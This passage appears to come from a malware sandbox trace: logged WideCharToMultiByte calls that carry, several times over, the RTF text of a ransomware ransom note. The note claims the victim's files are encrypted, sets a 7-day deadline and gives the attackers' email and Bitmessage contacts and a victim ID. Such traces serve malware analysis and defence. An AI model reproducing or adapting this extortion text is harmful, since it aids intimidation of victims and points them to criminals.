bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 